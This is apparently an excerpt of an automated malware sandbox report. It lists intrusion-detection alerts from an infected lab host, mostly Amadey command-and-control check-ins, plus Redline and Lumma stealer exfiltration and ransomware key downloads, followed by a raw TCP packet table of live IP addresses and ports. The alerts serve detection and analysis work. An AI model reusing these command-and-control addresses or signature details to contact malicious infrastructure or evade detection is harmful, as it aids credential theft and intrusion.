192.168.2.579.137.192.1849755802044623 10/13/23-15:21:20.814894	TCP	2044623	ET TROJAN Amadey Bot Activity (POST)	49755	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849992802027700 10/13/23-15:23:12.766670	TCP	2027700	ET TROJAN Amadey CnC Check-In	49992	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849815802027700 10/13/23-15:21:58.021683	TCP	2027700	ET TROJAN Amadey CnC Check-In	49815	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849910802027700 10/13/23-15:22:34.296636	TCP	2027700	ET TROJAN Amadey CnC Check-In	49910	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849945802027700 10/13/23-15:22:44.996438	TCP	2027700	ET TROJAN Amadey CnC Check-In	49945	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849773802027700 10/13/23-15:21:30.352704	TCP	2027700	ET TROJAN Amadey CnC Check-In	49773	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849986802027700 10/13/23-15:23:07.333075	TCP	2027700	ET TROJAN Amadey CnC Check-In	49986	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849904802027700 10/13/23-15:22:31.151402	TCP	2027700	ET TROJAN Amadey CnC Check-In	49904	80	192.168.2.5	79.137.192.18
51.255.152.132192.168.2.536011497262046056 10/13/23-15:21:08.276078	TCP	2046056	ET TROJAN Redline Stealer Activity (Response)	36011	49726	51.255.152.132	192.168.2.5
192.168.2.579.137.192.1849824802027700 10/13/23-15:22:01.551541	TCP	2027700	ET TROJAN Amadey CnC Check-In	49824	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849885802027700 10/13/23-15:22:24.718319	TCP	2027700	ET TROJAN Amadey CnC Check-In	49885	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849983802027700 10/13/23-15:23:05.573611	TCP	2027700	ET TROJAN Amadey CnC Check-In	49983	80	192.168.2.5	79.137.192.18
192.168.2.551.255.152.13249726360112046045 10/13/23-15:21:02.577805	TCP	2046045	ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	49726	36011	192.168.2.5	51.255.152.132
192.168.2.579.137.192.1849839802027700 10/13/23-15:22:06.909163	TCP	2027700	ET TROJAN Amadey CnC Check-In	49839	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849870802027700 10/13/23-15:22:17.367414	TCP	2027700	ET TROJAN Amadey CnC Check-In	49870	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849998802027700 10/13/23-15:23:17.197786	TCP	2027700	ET TROJAN Amadey CnC Check-In	49998	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850011802027700 10/13/23-15:23:27.276546	TCP	2027700	ET TROJAN Amadey CnC Check-In	50011	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850069802027700 10/13/23-15:24:09.282731	TCP	2027700	ET TROJAN Amadey CnC Check-In	50069	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849772802027700 10/13/23-15:21:29.419531	TCP	2027700	ET TROJAN Amadey CnC Check-In	49772	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849937802027700 10/13/23-15:22:42.272905	TCP	2027700	ET TROJAN Amadey CnC Check-In	49937	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849955802027700 10/13/23-15:22:49.589059	TCP	2027700	ET TROJAN Amadey CnC Check-In	49955	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849852802027700 10/13/23-15:22:10.463429	TCP	2027700	ET TROJAN Amadey CnC Check-In	49852	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849857802027700 10/13/23-15:22:12.381097	TCP	2027700	ET TROJAN Amadey CnC Check-In	49857	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850008802027700 10/13/23-15:23:24.569660	TCP	2027700	ET TROJAN Amadey CnC Check-In	50008	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850026802027700 10/13/23-15:23:38.933373	TCP	2027700	ET TROJAN Amadey CnC Check-In	50026	80	192.168.2.5	79.137.192.18
192.168.2.514.33.209.14749742802036333 10/13/23-15:21:15.445707	TCP	2036333	ET TROJAN Win32/Vodkagats Loader Requesting Payload	49742	80	192.168.2.5	14.33.209.147
192.168.2.579.137.192.1850003802027700 10/13/23-15:23:20.834324	TCP	2027700	ET TROJAN Amadey CnC Check-In	50003	80	192.168.2.5	79.137.192.18
192.168.2.5104.21.34.16649887802048093 10/13/23-15:22:25.374045	TCP	2048093	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In	49887	80	192.168.2.5	104.21.34.166
192.168.2.579.137.192.1850021802027700 10/13/23-15:23:33.891622	TCP	2027700	ET TROJAN Amadey CnC Check-In	50021	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849988802027700 10/13/23-15:23:09.175394	TCP	2027700	ET TROJAN Amadey CnC Check-In	49988	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849860802027700 10/13/23-15:22:13.283315	TCP	2027700	ET TROJAN Amadey CnC Check-In	49860	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849947802027700 10/13/23-15:22:45.968840	TCP	2027700	ET TROJAN Amadey CnC Check-In	49947	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849782802027700 10/13/23-15:21:38.174752	TCP	2027700	ET TROJAN Amadey CnC Check-In	49782	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849965802027700 10/13/23-15:22:56.037656	TCP	2027700	ET TROJAN Amadey CnC Check-In	49965	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849745802044696 10/13/23-15:21:19.391590	TCP	2044696	ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2	49745	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849806802027700 10/13/23-15:21:52.775205	TCP	2027700	ET TROJAN Amadey CnC Check-In	49806	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849960802027700 10/13/23-15:22:52.367814	TCP	2027700	ET TROJAN Amadey CnC Check-In	49960	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849957802027700 10/13/23-15:22:50.507935	TCP	2027700	ET TROJAN Amadey CnC Check-In	49957	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850031802027700 10/13/23-15:23:41.647202	TCP	2027700	ET TROJAN Amadey CnC Check-In	50031	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849801802027700 10/13/23-15:21:50.125830	TCP	2027700	ET TROJAN Amadey CnC Check-In	49801	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850034802027700 10/13/23-15:23:44.433170	TCP	2027700	ET TROJAN Amadey CnC Check-In	50034	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849779802027700 10/13/23-15:21:35.606807	TCP	2027700	ET TROJAN Amadey CnC Check-In	49779	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849930802027700 10/13/23-15:22:39.605062	TCP	2027700	ET TROJAN Amadey CnC Check-In	49930	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849877802027700 10/13/23-15:22:20.983769	TCP	2027700	ET TROJAN Amadey CnC Check-In	49877	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849731802027700 10/13/23-15:21:05.354963	TCP	2027700	ET TROJAN Amadey CnC Check-In	49731	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849893802027700 10/13/23-15:22:27.412106	TCP	2027700	ET TROJAN Amadey CnC Check-In	49893	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849914802027700 10/13/23-15:22:35.162156	TCP	2027700	ET TROJAN Amadey CnC Check-In	49914	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850049802027700 10/13/23-15:23:54.539563	TCP	2027700	ET TROJAN Amadey CnC Check-In	50049	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849822802027700 10/13/23-15:22:00.660821	TCP	2027700	ET TROJAN Amadey CnC Check-In	49822	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849991802027700 10/13/23-15:23:11.895804	TCP	2027700	ET TROJAN Amadey CnC Check-In	49991	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850064802027700 10/13/23-15:24:05.629334	TCP	2027700	ET TROJAN Amadey CnC Check-In	50064	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849777802027700 10/13/23-15:21:33.891838	TCP	2027700	ET TROJAN Amadey CnC Check-In	49777	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849774802027700 10/13/23-15:21:31.254996	TCP	2027700	ET TROJAN Amadey CnC Check-In	49774	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849993802027700 10/13/23-15:23:13.624324	TCP	2027700	ET TROJAN Amadey CnC Check-In	49993	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849898802027700 10/13/23-15:22:29.153493	TCP	2027700	ET TROJAN Amadey CnC Check-In	49898	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849814802027700 10/13/23-15:21:57.135438	TCP	2027700	ET TROJAN Amadey CnC Check-In	49814	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849780802027700 10/13/23-15:21:36.474782	TCP	2027700	ET TROJAN Amadey CnC Check-In	49780	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849855802027700 10/13/23-15:22:11.435427	TCP	2027700	ET TROJAN Amadey CnC Check-In	49855	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850006802027700 10/13/23-15:23:22.778047	TCP	2027700	ET TROJAN Amadey CnC Check-In	50006	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849808802027700 10/13/23-15:21:53.644769	TCP	2027700	ET TROJAN Amadey CnC Check-In	49808	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849849802027700 10/13/23-15:22:09.578897	TCP	2027700	ET TROJAN Amadey CnC Check-In	49849	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850036802027700 10/13/23-15:23:45.314916	TCP	2027700	ET TROJAN Amadey CnC Check-In	50036	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849785802027700 10/13/23-15:21:40.784546	TCP	2027700	ET TROJAN Amadey CnC Check-In	49785	80	192.168.2.5	79.137.192.18
192.168.2.5172.67.144.24549828802048093 10/13/23-15:22:02.714048	TCP	2048093	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In	49828	80	192.168.2.5	172.67.144.245
192.168.2.579.137.192.1850042802027700 10/13/23-15:23:49.853156	TCP	2027700	ET TROJAN Amadey CnC Check-In	50042	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849963802027700 10/13/23-15:22:55.119437	TCP	2027700	ET TROJAN Amadey CnC Check-In	49963	80	192.168.2.5	79.137.192.18
51.255.152.132192.168.2.536011497262043234 10/13/23-15:21:02.897594	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	36011	49726	51.255.152.132	192.168.2.5
192.168.2.579.137.192.1849784802027700 10/13/23-15:21:39.931298	TCP	2027700	ET TROJAN Amadey CnC Check-In	49784	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850051802027700 10/13/23-15:23:56.656010	TCP	2027700	ET TROJAN Amadey CnC Check-In	50051	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850066802027700 10/13/23-15:24:07.515838	TCP	2027700	ET TROJAN Amadey CnC Check-In	50066	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849962802027700 10/13/23-15:22:54.200991	TCP	2027700	ET TROJAN Amadey CnC Check-In	49962	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849971802027700 10/13/23-15:22:58.793498	TCP	2027700	ET TROJAN Amadey CnC Check-In	49971	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849775802027700 10/13/23-15:21:32.167578	TCP	2027700	ET TROJAN Amadey CnC Check-In	49775	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849766802027700 10/13/23-15:21:24.775098	TCP	2027700	ET TROJAN Amadey CnC Check-In	49766	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849953802027700 10/13/23-15:22:48.609935	TCP	2027700	ET TROJAN Amadey CnC Check-In	49953	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850023802027700 10/13/23-15:23:35.675502	TCP	2027700	ET TROJAN Amadey CnC Check-In	50023	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850032802027700 10/13/23-15:23:42.542005	TCP	2027700	ET TROJAN Amadey CnC Check-In	50032	80	192.168.2.5	79.137.192.18
192.168.2.5104.21.34.16649884802048094 10/13/23-15:22:26.047090	TCP	2048094	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration	49884	80	192.168.2.5	104.21.34.166
192.168.2.579.137.192.1849906802027700 10/13/23-15:22:32.080233	TCP	2027700	ET TROJAN Amadey CnC Check-In	49906	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850038802027700 10/13/23-15:23:46.224941	TCP	2027700	ET TROJAN Amadey CnC Check-In	50038	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849794802027700 10/13/23-15:21:45.851178	TCP	2027700	ET TROJAN Amadey CnC Check-In	49794	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849883802027700 10/13/23-15:22:23.784277	TCP	2027700	ET TROJAN Amadey CnC Check-In	49883	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849817802027700 10/13/23-15:21:58.889537	TCP	2027700	ET TROJAN Amadey CnC Check-In	49817	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849990802027700 10/13/23-15:23:11.019958	TCP	2027700	ET TROJAN Amadey CnC Check-In	49990	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850004802027700 10/13/23-15:23:21.818732	TCP	2027700	ET TROJAN Amadey CnC Check-In	50004	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850039802027700 10/13/23-15:23:47.144611	TCP	2027700	ET TROJAN Amadey CnC Check-In	50039	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849924802027700 10/13/23-15:22:37.840981	TCP	2027700	ET TROJAN Amadey CnC Check-In	49924	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849959802027700 10/13/23-15:22:51.427732	TCP	2027700	ET TROJAN Amadey CnC Check-In	49959	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850022802027700 10/13/23-15:23:34.799008	TCP	2027700	ET TROJAN Amadey CnC Check-In	50022	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849969802027700 10/13/23-15:22:57.876412	TCP	2027700	ET TROJAN Amadey CnC Check-In	49969	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849997802027700 10/13/23-15:23:16.309992	TCP	2027700	ET TROJAN Amadey CnC Check-In	49997	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849978802027700 10/13/23-15:23:01.498683	TCP	2027700	ET TROJAN Amadey CnC Check-In	49978	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850067802027700 10/13/23-15:24:08.408172	TCP	2027700	ET TROJAN Amadey CnC Check-In	50067	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850000802027700 10/13/23-15:23:19.031144	TCP	2027700	ET TROJAN Amadey CnC Check-In	50000	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850041802027700 10/13/23-15:23:48.928560	TCP	2027700	ET TROJAN Amadey CnC Check-In	50041	80	192.168.2.5	79.137.192.18
192.168.2.514.33.209.14749742802020826 10/13/23-15:21:15.445707	TCP	2020826	ET TROJAN Potential Dridex.Maldoc Minimal Executable Request	49742	80	192.168.2.5	14.33.209.147
91.227.16.22192.168.2.580498362018572 10/13/23-15:22:06.338085	TCP	2018572	ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families)	80	49836	91.227.16.22	192.168.2.5
192.168.2.579.137.192.1849797802027700 10/13/23-15:21:47.585414	TCP	2027700	ET TROJAN Amadey CnC Check-In	49797	80	192.168.2.5	79.137.192.18
14.33.209.147192.168.2.580497352036335 10/13/23-15:21:09.616928	TCP	2036335	ET TROJAN Win32/Filecoder.STOP Variant Public Key Download	80	49735	14.33.209.147	192.168.2.5
192.168.2.579.137.192.1849981802027700 10/13/23-15:23:03.363566	TCP	2027700	ET TROJAN Amadey CnC Check-In	49981	80	192.168.2.5	79.137.192.18
104.198.2.251192.168.2.580497182037771 10/13/23-15:20:38.811453	TCP	2037771	ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49718	104.198.2.251	192.168.2.5
192.168.2.579.137.192.1849921802027700 10/13/23-15:22:36.961647	TCP	2027700	ET TROJAN Amadey CnC Check-In	49921	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1849940802027700 10/13/23-15:22:43.193695	TCP	2027700	ET TROJAN Amadey CnC Check-In	49940	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850007802027700 10/13/23-15:23:23.651568	TCP	2027700	ET TROJAN Amadey CnC Check-In	50007	80	192.168.2.5	79.137.192.18
192.168.2.5187.18.108.15849738802020826 10/13/23-15:21:09.695197	TCP	2020826	ET TROJAN Potential Dridex.Maldoc Minimal Executable Request	49738	80	192.168.2.5	187.18.108.158
192.168.2.579.137.192.1849778802027700 10/13/23-15:21:34.751108	TCP	2027700	ET TROJAN Amadey CnC Check-In	49778	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850048802027700 10/13/23-15:23:53.544944	TCP	2027700	ET TROJAN Amadey CnC Check-In	50048	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850060802027700 10/13/23-15:24:02.998074	TCP	2027700	ET TROJAN Amadey CnC Check-In	50060	80	192.168.2.5	79.137.192.18
192.168.2.579.137.192.1850013802027700 10/13/23-15:23:28.422770	TCP	2027700	ET TROJAN Amadey CnC Check-In	50013	80	192.168.2.5	79.137.192.18

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2023 15:20:29.422555923 CEST	49715	80	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:29.768003941 CEST	80	49715	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:29.768205881 CEST	49715	80	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:29.768949986 CEST	49715	80	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:29.768975973 CEST	49715	80	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:30.113838911 CEST	80	49715	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:30.113950014 CEST	80	49715	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:30.113991976 CEST	80	49715	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:30.119077921 CEST	49716	443	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:30.119117975 CEST	443	49716	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:30.119314909 CEST	49716	443	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:30.119760990 CEST	49716	443	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:30.119776011 CEST	443	49716	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:30.165658951 CEST	49715	80	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:30.828509092 CEST	443	49716	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:30.828588009 CEST	49716	443	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:30.832711935 CEST	49716	443	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:30.832720041 CEST	443	49716	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:30.832933903 CEST	443	49716	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:30.883466959 CEST	49716	443	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:30.926489115 CEST	443	49716	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:31.516139030 CEST	443	49716	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:31.516161919 CEST	443	49716	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:31.516299963 CEST	443	49716	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:31.516338110 CEST	49716	443	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:31.517357111 CEST	49716	443	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:31.517357111 CEST	49716	443	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:31.517390013 CEST	49716	443	192.168.2.5	91.215.85.209
Oct 13, 2023 15:20:31.517405033 CEST	443	49716	91.215.85.209	192.168.2.5
Oct 13, 2023 15:20:36.479127884 CEST	49717	80	192.168.2.5	35.205.61.67
Oct 13, 2023 15:20:36.792063951 CEST	80	49717	35.205.61.67	192.168.2.5
Oct 13, 2023 15:20:36.792169094 CEST	49717	80	192.168.2.5	35.205.61.67
Oct 13, 2023 15:20:36.792397022 CEST	49717	80	192.168.2.5	35.205.61.67
Oct 13, 2023 15:20:36.792433023 CEST	49717	80	192.168.2.5	35.205.61.67
Oct 13, 2023 15:20:37.111609936 CEST	80	49717	35.205.61.67	192.168.2.5
Oct 13, 2023 15:20:37.111670971 CEST	80	49717	35.205.61.67	192.168.2.5
Oct 13, 2023 15:20:37.113953114 CEST	80	49717	35.205.61.67	192.168.2.5
Oct 13, 2023 15:20:37.114011049 CEST	49717	80	192.168.2.5	35.205.61.67
Oct 13, 2023 15:20:37.114073992 CEST	49717	80	192.168.2.5	35.205.61.67
Oct 13, 2023 15:20:37.424945116 CEST	80	49717	35.205.61.67	192.168.2.5
Oct 13, 2023 15:20:38.266735077 CEST	49718	80	192.168.2.5	104.198.2.251
Oct 13, 2023 15:20:38.537004948 CEST	80	49718	104.198.2.251	192.168.2.5
Oct 13, 2023 15:20:38.537163019 CEST	49718	80	192.168.2.5	104.198.2.251
Oct 13, 2023 15:20:38.537377119 CEST	49718	80	192.168.2.5	104.198.2.251
Oct 13, 2023 15:20:38.537935019 CEST	49718	80	192.168.2.5	104.198.2.251
Oct 13, 2023 15:20:38.811407089 CEST	80	49718	104.198.2.251	192.168.2.5
Oct 13, 2023 15:20:38.811434984 CEST	80	49718	104.198.2.251	192.168.2.5
Oct 13, 2023 15:20:38.811453104 CEST	80	49718	104.198.2.251	192.168.2.5
Oct 13, 2023 15:20:38.811469078 CEST	80	49718	104.198.2.251	192.168.2.5
Oct 13, 2023 15:20:38.811561108 CEST	49718	80	192.168.2.5	104.198.2.251
Oct 13, 2023 15:20:38.825076103 CEST	49718	80	192.168.2.5	104.198.2.251
Oct 13, 2023 15:20:39.096930981 CEST	80	49718	104.198.2.251	192.168.2.5
Oct 13, 2023 15:20:44.292118073 CEST	49719	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:44.906279087 CEST	80	49719	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:44.906394958 CEST	49719	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:44.906621933 CEST	49719	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:44.906655073 CEST	49719	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:45.478696108 CEST	80	49719	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:45.479151011 CEST	80	49719	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:45.479212046 CEST	80	49719	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:45.479332924 CEST	80	49719	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:45.479374886 CEST	49719	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:45.479404926 CEST	49719	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:46.052192926 CEST	80	49719	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:47.833050966 CEST	49720	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:48.401648045 CEST	80	49720	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:48.401755095 CEST	49720	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:48.402020931 CEST	49720	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:48.402060986 CEST	49720	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:48.972887993 CEST	80	49720	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:48.972922087 CEST	80	49720	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:48.973005056 CEST	80	49720	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:48.973325014 CEST	80	49720	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:48.973360062 CEST	49720	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:48.973403931 CEST	49720	80	192.168.2.5	34.143.166.163
Oct 13, 2023 15:20:49.142882109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:49.494580984 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.494812965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:49.507213116 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:49.507302999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:49.550806999 CEST	80	49720	34.143.166.163	192.168.2.5
Oct 13, 2023 15:20:49.858915091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.859113932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.879348040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.879414082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.879452944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.879488945 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.879528999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.879573107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.879607916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.879647970 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.879668951 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:49.879668951 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:49.879669905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:49.879683971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.879723072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:49.879744053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:49.879770041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.231637955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.231699944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.231739998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.231779099 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.231815100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.231849909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.231865883 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.231867075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.231892109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.231971025 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.231976032 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232012987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232029915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.232157946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232196093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232233047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232232094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.232270956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232286930 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.232373953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232433081 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.232502937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232568979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232619047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.232673883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232711077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232767105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.232834101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232903004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:50.232956886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:50.583741903 CEST	80	49721	91.215.85.17	192.168.2.5
